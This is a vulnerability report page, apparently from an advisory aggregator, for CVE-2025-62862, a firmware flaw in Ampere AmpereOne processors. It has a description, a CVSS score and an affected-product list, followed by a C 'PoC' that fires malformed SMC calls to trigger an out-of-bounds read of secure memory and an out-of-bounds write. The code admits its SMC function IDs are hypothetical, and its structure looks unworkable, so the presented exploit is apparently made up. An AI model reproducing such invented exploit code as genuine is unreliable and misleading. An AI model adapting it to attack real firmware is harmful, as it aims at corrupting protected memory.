Security Vulnerability Report
CVE-2025-62862 CVSS 4.6 MEDIUM

CVE-2025-62862

Published: 2025-12-16 17:16:10
Last Modified: 2025-12-31 00:28:47

Description

Ampere AmpereOne AC03 devices before 3.5.9.3, AmpereOne AC04 devices before 4.4.5.2, and AmpereOne M devices before 5.4.5.1 allow an incorrectly formed SMC call to the UEFI-MM Boot Error Record Table driver that could result in (1) an out-of-bounds read which leaks Secure-EL0 information to a process running in Non-Secure state or (2) an out-of-bounds write which corrupts Secure or Non-Secure memory, limited to memory mapped to the UEFI-MM Secure Partition by the Secure Partition Manager.

CVSS Details

CVSS Score: 4.6
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:L

Configurations (Affected Products)

cpe:2.3:o:amperecomputing:ampereone_a192-32m_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:amperecomputing:ampereone_a192-32m:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:amperecomputing:ampereone_a192-26m_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:amperecomputing:ampereone_a192-26m:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:amperecomputing:ampereone_a160-28m_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:amperecomputing:ampereone_a160-28m:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:amperecomputing:ampereone_a144-33m_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:amperecomputing:ampereone_a144-33m:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:amperecomputing:ampereone_a144-26m_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:amperecomputing:ampereone_a144-26m:-:*:*:*:*:*:*:* - NOT VULNERABLE
Ampere AmpereOne AC03 < 3.5.9.3
Ampere AmpereOne AC04 < 4.4.5.2
Ampere AmpereOne M < 5.4.5.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// CVE-2025-62862 PoC - Conceptual SMC Call Trigger
// This PoC demonstrates the concept of triggering the vulnerable SMC call
// Note: Actual exploitation requires ARM64 environment and UEFI-MM access

#include <stdio.h>
#include <stdint.h>

// SMC function IDs (hypothetical values for demonstration)
#define SMC_CALL_BOOT_ERROR_RECORD 0xC4000060
#define SMC_CALL_ID_MASK           0xFFFFFFFF

// Boot Error Record Table structure (simplified)
struct boot_error_record {
    uint64_t record_id;
    uint64_t buffer_addr;
    uint64_t buffer_size;
    uint32_t flags;
};

// Trigger vulnerable SMC call with malformed parameters
void trigger_vulnerable_smc(uint64_t func_id, uint64_t arg0,
                            uint64_t arg1, uint64_t arg2)
{
    register uint64_t x0 asm("x0") = func_id;
    register uint64_t x1 asm("x1") = arg0;
    register uint64_t x2 asm("x2") = arg1;
    register uint64_t x3 asm("x3") = arg2;

    // SMC instruction - transition to secure monitor mode
    __asm__ volatile("smc #0" : "+r"(x0), "+r"(x1), "+r"(x2), "+r"(x3));
}

int main(void)
{
    printf("[*] CVE-2025-62862 PoC - AmpereOne UEFI-MM SMC Vulnerability\n");
    printf("[*] Target: Ampere AmpereOne AC03/AC04/M devices\n\n");

    // Out-of-bounds read trigger
    printf("[>] Triggering OOB Read - Leaking Secure-EL0 information\n");
    struct boot_error_record record = {
        .record_id   = 0x01,
        .buffer_addr = 0xFFFFFFFFFFFFFFFF, // Invalid address
        .buffer_size = 0x10000,            // Large size
        .flags       = 0x00
    };
    trigger_vulnerable_smc(
        SMC_CALL_BOOT_ERROR_RECORD,
        (uint64_t)&record,
        0xFFFFFFFF, // Malformed parameter
        0x00
    );

    printf("[>] Triggering OOB Write - Corrupting Secure/Non-Secure memory\n");
    // Out-of-bounds write trigger
    trigger_vulnerable_smc(
        SMC_CALL_BOOT_ERROR_RECORD,
        0x00,
        0xFFFFFFFFFFFFFFFF, // Invalid write address
        0x4141414141414141  // Malicious data
    );

    printf("[!] Note: Actual exploitation requires UEFI-MM access and proper ARM64 environment\n");
    return 0;
}
